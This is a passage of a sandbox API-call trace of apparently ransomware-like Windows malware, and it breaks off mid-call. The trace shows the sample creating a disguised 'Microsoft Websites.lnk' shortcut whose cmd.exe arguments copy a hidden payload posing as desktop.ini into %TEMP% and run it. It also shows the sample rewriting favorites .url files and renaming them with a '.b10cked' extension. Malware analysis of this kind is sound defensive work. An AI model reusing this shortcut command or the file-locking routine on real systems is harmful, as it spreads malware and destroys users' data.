[0213.364] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0213.364] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0213.364] CharUpperBuffW (in: lpsz="explorer.exe \"Microsoft Websites\" & type \"Microsoft Websites\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x75 | out: lpsz="EXPLORER.EXE \"MICROSOFT WEBSITES\" & TYPE \"MICROSOFT WEBSITES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x75 [0213.364] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0213.364] CharUpperBuffW (in: lpsz="explorer.exe \"Microsoft Websites\" & type \"Microsoft Websites\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x76 | out: lpsz="EXPLORER.EXE \"MICROSOFT WEBSITES\" & TYPE \"MICROSOFT WEBSITES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x76 [0213.364] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0213.364] CoInitialize (pvReserved=0x0) returned 0x0 [0213.365] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0213.366] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0213.366] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0213.366] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0213.367] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Microsoft Websites\" & type \"Microsoft Websites\\desktop.ini\" > \"%TEMP%\\CECoIF7G.exe\" && \"%TEMP%\\CECoIF7G.exe\"") returned 0x0 [0213.367] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0213.367] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0213.368] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0213.368] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites.lnk", fRemember=0) returned 0x0 [0213.374] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0213.374] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0213.374] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0213.374] CoUninitialize () [0213.375] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.375] ReleaseMutex (hMutex=0xf8) returned 1 [0213.375] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.375] ReleaseMutex (hMutex=0xf8) returned 1 [0213.375] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.375] ReleaseMutex (hMutex=0xf8) returned 1 [0213.375] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.375] ReleaseMutex (hMutex=0xf8) returned 1 [0213.375] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27019634025) returned 1 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.409] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.410] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.410] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.410] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.410] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.410] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.410] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE site on Microsoft.com.url", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0213.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE site on Microsoft.com.url", cchWideChar=28, lpMultiByteStr=0x132f75c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IE site on Microsoft.com.url", lpUsedDefaultChar=0x0) returned 28 [0213.414] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0213.414] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.415] CloseHandle (hObject=0x120) returned 1 [0213.415] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL") returned 0x2f [0213.416] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0213.416] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9d4, dwThreadId=0x9dc)) returned 1 [0213.418] CloseHandle (hObject=0x1b4) returned 1 [0213.418] CloseHandle (hObject=0x120) returned 1 [0213.418] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.418] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.418] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 2 [0213.418] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.418] ReleaseMutex (hMutex=0xf8) returned 1 [0213.418] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.418] ReleaseMutex (hMutex=0xf8) returned 1 [0213.418] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.418] ReleaseMutex (hMutex=0xf8) returned 1 [0213.418] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.418] ReleaseMutex (hMutex=0xf8) returned 1 [0213.418] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27020842641) returned 1 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.421] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.422] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.422] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.422] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.422] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, 